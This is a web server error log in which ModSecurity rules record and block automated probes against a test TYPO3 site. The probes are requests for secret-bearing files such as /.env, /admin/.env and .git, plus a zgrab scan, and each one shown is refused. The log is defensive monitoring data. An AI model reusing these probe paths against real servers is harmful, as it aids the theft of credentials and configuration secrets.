[Sat Sep 20 07:20:52.917644 2025] [:error] [pid 2867880] [client 195.178.110.15:52294] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aM45tEW3VGRkhouZ08DpQgAAAAc"]
[Sat Sep 20 07:20:52.917898 2025] [:error] [pid 2867880] [client 195.178.110.15:52294] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aM45tEW3VGRkhouZ08DpQgAAAAc"]
[Sat Sep 20 07:20:52.918063 2025] [:error] [pid 2867880] [client 195.178.110.15:52294] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aM45tEW3VGRkhouZ08DpQgAAAAc"]
[Sat Sep 20 07:20:54.167000 2025] [:error] [pid 2871947] [client 195.178.110.15:52332] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aM45tk9ZCrSFbu-il1n8pgAAAAk"]
[Sat Sep 20 07:20:54.167267 2025] [:error] [pid 2871947] [client 195.178.110.15:52332] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aM45tk9ZCrSFbu-il1n8pgAAAAk"]
[Sat Sep 20 07:20:54.167447 2025] [:error] [pid 2871947] [client 195.178.110.15:52332] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aM45tk9ZCrSFbu-il1n8pgAAAAk"]
[Sat Sep 20 07:20:54.309545 2025] [:error] [pid 2867837] [client 195.178.110.15:52340] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aM45thWoV8GvGoZiBq3WowAAAAM"]
[Sat Sep 20 07:20:54.309784 2025] [:error] [pid 2867837] [client 195.178.110.15:52340] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aM45thWoV8GvGoZiBq3WowAAAAM"]
[Sat Sep 20 07:20:54.309959 2025] [:error] [pid 2867837] [client 195.178.110.15:52340] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aM45thWoV8GvGoZiBq3WowAAAAM"]
[Sat Sep 20 07:20:54.489066 2025] [:error] [pid 2867898] [client 195.178.110.15:52350] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aM45tq3RNP9eqEvJAdCb4AAAAAg"]
[Sat Sep 20 07:20:54.489308 2025] [:error] [pid 2867898] [client 195.178.110.15:52350] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aM45tq3RNP9eqEvJAdCb4AAAAAg"]
[Sat Sep 20 07:20:54.489483 2025] [:error] [pid 2867898] [client 195.178.110.15:52350] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aM45tq3RNP9eqEvJAdCb4AAAAAg"]
[Sat Sep 20 07:35:11.934859 2025] [:error] [pid 2867838] [client 96.41.38.202:39144] [client 96.41.38.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM49D3vfo_1mV5C9QU3Z4wAAAAQ"]
[Sat Sep 20 07:35:11.935158 2025] [:error] [pid 2867838] [client 96.41.38.202:39144] [client 96.41.38.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM49D3vfo_1mV5C9QU3Z4wAAAAQ"]
[Sat Sep 20 07:35:11.935330 2025] [:error] [pid 2867838] [client 96.41.38.202:39144] [client 96.41.38.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM49D3vfo_1mV5C9QU3Z4wAAAAQ"]
[Sat Sep 20 07:35:12.116354 2025] [authz_core:error] [pid 2867838] [client 96.41.38.202:39144] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Sep 20 08:32:16.828565 2025] [authz_core:error] [pid 2867834] [client 45.148.10.246:56944] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Sep 20 08:39:15.798876 2025] [authz_core:error] [pid 2867836] [client 196.251.88.64:36706] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Sep 20 15:39:11.058948 2025] [authz_core:error] [pid 2872146] [client 213.209.157.244:39132] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Sep 20 18:32:40.597408 2025] [:error] [pid 2875676] [client 217.138.216.244:60210] [client 217.138.216.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM7XKFI6g7UOwi4TEyYWlQAAAAY"]
[Sat Sep 20 18:32:40.597654 2025] [:error] [pid 2875676] [client 217.138.216.244:60210] [client 217.138.216.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM7XKFI6g7UOwi4TEyYWlQAAAAY"]
[Sat Sep 20 18:32:40.597831 2025] [:error] [pid 2875676] [client 217.138.216.244:60210] [client 217.138.216.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM7XKFI6g7UOwi4TEyYWlQAAAAY"]
[Sun Sep 21 05:45:54.971480 2025] [:error] [pid 2893152] [client 176.65.148.43:41758] [client 176.65.148.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM908sgsV33bJGhDi3OiFQAAAAY"]
[Sun Sep 21 05:45:54.971743 2025] [:error] [pid 2893152] [client 176.65.148.43:41758] [client 176.65.148.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM908sgsV33bJGhDi3OiFQAAAAY"]
[Sun Sep 21 05:45:54.971907 2025] [:error] [pid 2893152] [client 176.65.148.43:41758] [client 176.65.148.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM908sgsV33bJGhDi3OiFQAAAAY"]
[Sun Sep 21 09:35:10.744374 2025] [authz_core:error] [pid 2896915] [client 45.148.10.246:52222] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Sep 21 11:43:12.476932 2025] [authz_core:error] [pid 2892810] [client 213.209.157.232:48604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Sep 21 15:15:05.121917 2025] [:error] [pid 2896914] [client 196.251.70.47:34134] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM_6WZdxuxxTlvgzt8MeWgAAAAg"]
[Sun Sep 21 15:15:05.122181 2025] [:error] [pid 2896914] [client 196.251.70.47:34134] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM_6WZdxuxxTlvgzt8MeWgAAAAg"]
[Sun Sep 21 15:15:05.122326 2025] [:error] [pid 2896914] [client 196.251.70.47:34134] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM_6WZdxuxxTlvgzt8MeWgAAAAg"]
[Mon Sep 22 08:58:51.926966 2025] [:error] [pid 2923412] [client 196.251.70.47:57146] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNDzq2Fmr1h0C_J1j_zg-QAAAAg"]
[Mon Sep 22 08:58:51.927254 2025] [:error] [pid 2923412] [client 196.251.70.47:57146] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNDzq2Fmr1h0C_J1j_zg-QAAAAg"]
[Mon Sep 22 08:58:51.927436 2025] [:error] [pid 2923412] [client 196.251.70.47:57146] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNDzq2Fmr1h0C_J1j_zg-QAAAAg"]
[Tue Sep 23 13:34:20.453560 2025] [:error] [pid 2942731] [client 3.146.111.124:35929] [client 3.146.111.124] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aNKFvJKnWnU9xU3Q1DmG9AAAAAA"]
[Tue Sep 23 13:34:20.453989 2025] [:error] [pid 2942731] [client 3.146.111.124:35929] [client 3.146.111.124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aNKFvJKnWnU9xU3Q1DmG9AAAAAA"]
[Tue Sep 23 13:34:20.454145 2025] [:error] [pid 2942731] [client 3.146.111.124:35929] [client 3.146.111.124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aNKFvJKnWnU9xU3Q1DmG9AAAAAA"]
[Wed Sep 24 07:20:24.855714 2025] [:error] [pid 2967881] [client 89.208.69.41:49697] [client 89.208.69.41] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNN_mJI58xXToswI6_cbowAAAAU"]
[Wed Sep 24 07:20:24.856001 2025] [:error] [pid 2967881] [client 89.208.69.41:49697] [client 89.208.69.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNN_mJI58xXToswI6_cbowAAAAU"]
[Wed Sep 24 07:20:24.856179 2025] [:error] [pid 2967881] [client 89.208.69.41:49697] [client 89.208.69.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNN_mJI58xXToswI6_cbowAAAAU"]
[Thu Sep 25 03:06:25.675754 2025] [authz_core:error] [pid 2991512] [client 93.123.109.7:41658] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Sep 26 03:07:59.049292 2025] [:error] [pid 3017925] [client 176.65.149.195:33350] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNXnb_nhOUSNVCKVNn5oRgAAAAQ"]
[Fri Sep 26 03:07:59.051960 2025] [:error] [pid 3017925] [client 176.65.149.195:33350] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNXnb_nhOUSNVCKVNn5oRgAAAAQ"]
[Fri Sep 26 03:07:59.052210 2025] [:error] [pid 3017925] [client 176.65.149.195:33350] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNXnb_nhOUSNVCKVNn5oRgAAAAQ"]
[Tue Sep 30 11:23:37.191885 2025] [authz_core:error] [pid 3124033] [client 45.148.10.154:46220] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Oct 01 05:29:28.132705 2025] [authz_core:error] [pid 3144153] [client 54.89.41.60:56276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Oct 01 08:38:35.541148 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNzMa2SEGjAj3vHc8W8gYwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:35.541406 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNzMa2SEGjAj3vHc8W8gYwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:35.541584 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNzMa2SEGjAj3vHc8W8gYwAAAAA"], referer: https://www.google.com/
